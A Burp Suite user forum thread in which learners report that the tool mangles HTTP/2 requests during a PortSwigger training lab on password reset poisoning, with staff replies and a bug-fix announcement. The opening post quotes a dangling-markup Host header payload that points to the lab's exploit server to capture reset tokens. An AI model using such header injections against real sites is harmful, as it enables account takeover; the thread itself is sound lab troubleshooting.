Burp Suite User Forum


Adding Space in Header Kettles Request

Lewis | Last updated: May 26, 2023 12:03PM UTC

Hey, I'm going through the following lab: Password reset poisoning via dangling markup.

Whenever I add a space to my Host header, Burp Suite kettles my request, which causes the CSRF token to not be sent along correctly, giving me an HTTP 400 response "Missing parameter 'csrf'".

According to the explanation of kettling at https://portswigger.net/burp/documentation/desktop/http2 this header value should not cause the request to be kettled:

Host: 0ac50042037df6f081b8393b00dd00b6.web-security-academy.net:'<img src="exploit-0a4c00b30384f625812c38d8017e00fa.exploit-server.net/?src=

Am I misunderstanding something here?

Michelle, PortSwigger Agent | Last updated: May 30, 2023 12:17PM UTC

Thanks for getting in touch. We'll take a look through the lab and be in touch soon.

Michelle, PortSwigger Agent | Last updated: May 31, 2023 02:33PM UTC

Hi, In step 7, changing the Host header using the Inspector panel rather than directly in the Message Editor should allow the request to be sent successfully. Please let me know if this helps.

Janis | Last updated: Jun 17, 2023 06:12PM UTC

Same problem here. The solution provided by Michelle didn't help either; the response is still "Missing parameter csrf" or completely empty. I'm on Version 2023.6.1 (2023.6.1).

Ben, PortSwigger Agent | Last updated: Jun 20, 2023 08:34AM UTC

Hi, Are you able to provide some specific details (some screenshots might help) of what you are doing when you experience this issue so that we can see exactly the circumstances involved?

Humble255 | Last updated: Jun 30, 2023 04:53AM UTC

Hi there, I have the same issue in lab lab-host-header-basic-password-reset-poisoning. Even when I changed it with the Inspector, the BE rejected the request as an invalid host, and Burp showed a popup that the request is kettled. However, I was able to work around it. I did not replace the full host, but copied the custom host into the middle of the original one. Then I was removing letter by letter before and after my custom host. Then it worked.

Liam | Last updated: Jul 26, 2023 10:30AM UTC

Same problem for me. Tried all above recommended solutions without success.

Ben, PortSwigger Agent | Last updated: Jul 26, 2023 05:06PM UTC

Hi Liam, Just to clarify - are you having issues with the 'Password reset poisoning via dangling markup' lab that other users in this thread have mentioned or the 'Basic password reset poisoning' lab that the previous poster mentioned?

Dominyque, PortSwigger Agent | Last updated: Aug 30, 2023 12:23PM UTC

Hi All, We wanted to update the thread with the news that the issue where adding dangling markup to a request in Message Editor causes the request to be kettled has been fixed in v2023.10 (https://portswigger.net/burp/releases/professional-community-2023-10).
